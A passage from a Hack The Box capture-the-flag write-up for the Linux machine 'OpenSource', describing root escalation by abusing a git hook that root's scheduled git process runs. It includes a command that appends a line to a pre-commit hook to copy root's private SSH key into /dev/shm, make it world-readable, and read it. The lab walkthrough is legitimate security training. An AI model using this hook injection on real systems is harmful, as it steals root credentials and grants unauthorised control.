Rogue-1/HTB/Machines/Linux/OpenSource.md

 2022/09/28 18:49:01 CMD: UID=0    PID=11825  | /usr/lib/git-core/git-remote-http origin http://opensource.htb:3000/dev01/home-backup.git
 ```

+GTFO has some good info on this but its not perfect so it needed a little editing.

 https://gtfobins.github.io/gtfobins/git/

+I took a gamble and attempted to get the root ssh keys even though I couldnt confirm they were actually available.

 ```console
 dev01@opensource:~$ echo "cp /root/.ssh/id_rsa /dev/shm && chmod 777 /dev/shm/id_rsa" >> /home/dev01/.git/hooks/pre-commit
 ```
+But it worked and I got the key and flag!

 ```console
 dev01@opensource:~$ cat /dev/shm/id_rsa